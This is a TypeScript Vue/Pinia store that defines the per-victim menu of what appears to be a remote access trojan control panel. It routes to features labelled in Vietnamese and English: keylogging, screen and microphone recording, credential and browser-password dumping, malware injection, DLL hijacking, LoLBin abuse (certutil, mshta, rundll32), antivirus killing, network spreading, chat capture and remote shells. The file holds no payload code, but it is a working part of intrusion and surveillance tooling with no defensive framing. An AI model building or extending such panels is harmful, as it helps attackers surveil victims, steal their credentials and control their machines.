import { axios_instance } from "@/api/api";
import { router } from "@/router/router";
import { defineStore } from "pinia";
import { computed, onMounted, ref, watch } from "vue";
import { toast } from "vue3-toastify";
import type { client_detail, type_str } from ".";

export const use_client_detail = defineStore("client_detail", () => {
  const id = computed(() => String(router.currentRoute.value.params.client_id));
  const loading = ref<boolean>(false);

  const client_detail = ref<client_detail>();

  const tabs: {
    value: string;
    keywords?: string[];
    route_name: string;
    route_params?: Record<string, string> | undefined;
    ico: string;
    be_mapping: type_str | undefined;
    disabled: boolean;
  }[] = [
    {
      value: "Thông tin hệ thống",
      keywords: ["thông tin máy", "system info", "cấu hình máy"],
      route_name: `ClientInfo`,
      ico: "fa-solid fa-circle-info",
      be_mapping: undefined,
      disabled: false,
    },
    {
      value: "Quản lý thư mục",
      keywords: ["file manager", "files", "tệp tin", "folder", "explorer"],
      route_name: `ClientExplorer`,
      ico: "fa-solid fa-folder",
      be_mapping: "explore",
      disabled: false,
    },
    {
      value: "Tiến trình",
      keywords: ["process", "task manager"],
      route_name: `ClientProcess`,
      ico: "fa-solid fa-bolt-lightning",
      be_mapping: "process",
      disabled: false,
    },
    {
      value: "Ứng dụng",
      keywords: ["applications", "installed apps", "phần mềm"],
      route_name: `ClientApplication`,
      ico: "fa-solid fa-circle-play",
      be_mapping: "app_install",
      disabled: false,
    },
    {
      value: "Cổng mở",
      keywords: ["open ports", "network ports"],
      route_name: `ClientOpenedPort`,
      ico: "fa-solid fa-door-open",
      be_mapping: "open_port",
      disabled: false,
    },
    {
      value: "Thu thập và lây lan",
      keywords: ["gathering", "spreading", "network scanning"],
      route_name: "ClientGathering",
      ico: "fa-solid fa-shield-virus",
      be_mapping: undefined,
      disabled: false,
    },
    {
      value: "Ghi phím",
      keywords: ["keylogger", "keystrokes", "bàn phím"],
      route_name: `ClientKeylogger`,
      ico: "fa-solid fa-keyboard",
      be_mapping: "key_logger",
      disabled: false,
    },
    {
      value: "Chụp màn hình",
      keywords: ["screenshot", "screen capture"],
      route_name: `ClientScreenshot`,
      ico: "fa-solid fa-camera",
      be_mapping: "screenshot",
      disabled: false,
    },
    {
      value: "Lịch sử duyệt web",
      keywords: ["browser history"],
      route_name: `ClientBrowserHistory`,
      ico: "fa-solid fa-book",
      be_mapping: "browser_history",
      disabled: true,
    },
    {
      value: "Lệnh hệ thống",
      keywords: ["cmd", "command", "dòng lệnh", "terminal"],
      route_name: `ClientCommand`,
      ico: "fa-solid fa-terminal",
      be_mapping: "system_cmd",
      disabled: false,
    },
    {
      value: "Terminal tương tác",
      route_name: "ClientTerminal",
      ico: "fa-solid fa-terminal",
      be_mapping: "interactive_terminal",
      disabled: false,
    },
    {
      value: "Lịch sử Chat",
      keywords: ["chat history", "tin nhắn", "messages"],
      route_name: "ClientChatHistory",
      route_params: {
        chat_type: "zalo-web",
      },
      ico: "fa-solid fa-comments",
      be_mapping: "chat_history",
      disabled: true,
    },
    {
      value: "Hoạt động gần đây",
      keywords: ["recent activity"],
      route_name: "ClientLastActivity",
      ico: "fa-solid fa-clock-rotate-left",
      be_mapping: "last_activity",
      disabled: false,
    },
    {
      value: "Trích xuất mật khẩu",
      keywords: ["dump credentials", "password"],
      route_name: "ClientDumpCredential",
      ico: "fa-solid fa-key",
      be_mapping: "dump-credential",
      disabled: false,
    },
    {
      value: "Credential trình duyệt",
      keywords: ["browser credentials", "mật khẩu trình duyệt"],
      route_name: "ClientBrowserCredential",
      ico: "fa-solid fa-lock",
      be_mapping: "browser-credential",
      disabled: false,
    },
    {
      value: "Tiêm mã độc",
      keywords: ["injection", "inject"],
      route_name: "ClientInject",
      ico: "fa-solid fa-syringe",
      be_mapping: "inject",
      disabled: false,
    },
    {
      value: "DLL Missing + Hijack",
      keywords: ["dll hijacking", "thiếu dll", "com dll"],
      route_name: "ClientFindDML",
      ico: "fa-solid fa-magnifying-glass",
      be_mapping: "find-dml",
      disabled: false,
    },
    {
      value: "LoLBin",
      keywords: ["lolbin", "certutil", "mshta", "regsvr32", "rundll32", "bitsadmin"],
      route_name: "ClientLolBin",
      ico: "fa-solid fa-bolt",
      be_mapping: "lol_bin",
      disabled: false,
    },
    {
      value: "Quay video màn hình",
      keywords: ["recording", "video", "ghi hình", "quay video", "microphone"],
      route_name: "ClientRecord",
      ico: "fa-solid fa-video",
      be_mapping: "record",
      disabled: false,
    },
    {
      value: "Kill AV",
      keywords: ["kill av", "diệt virus", "defender", "bitdefender", "kaspersky"],
      route_name: "ClientKillAV",
      ico: "fa-solid fa-shield-virus",
      be_mapping: undefined,
      disabled: false,
    },
    {
      value: "Cài đặt",
      route_name: "ClientSetting",
      ico: "fa-solid fa-gear",
      be_mapping: undefined,
      disabled: false,
    },
  ];

  function isValidUUID(uuidString: string | undefined): boolean {
    return uuidString !== undefined && uuidString !== "undefined";
    // if (!uuidString) return false;

    // const uuidRegex =
    //   /^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{11}$/;
    // return uuidRegex.test(uuidString);
  }

  onMounted(() => get_client_detail());
  const get_client_detail = async () => {
    if (!isValidUUID(id.value)) return;
    loading.value = true;
    try {
      const response = await axios_instance.get<{ data: client_detail }>(
        `/api/v1/view/agent/${id.value}`,
      );
      client_detail.value = response.data.data;
    } catch (err) {
      toast.error(err);
    } finally {
      loading.value = false;
    }
  };
  watch(
    () => [id.value],
    () => get_client_detail(),
  );
  const update_permission = async (permissions: string[]) => {
    axios_instance
      .post(`/api/v1/view/agent/${id.value}`, {
        permissions,
      })
      .then(() => {
        toast.success("Cập nhật thành công");
        get_client_detail();
      })
      .catch((err) => {
        toast.error(err);
      })
      .finally();
  };

  return {
    id,
    tabs,
    loading,
    client_detail,
    update_permission,
  };
});
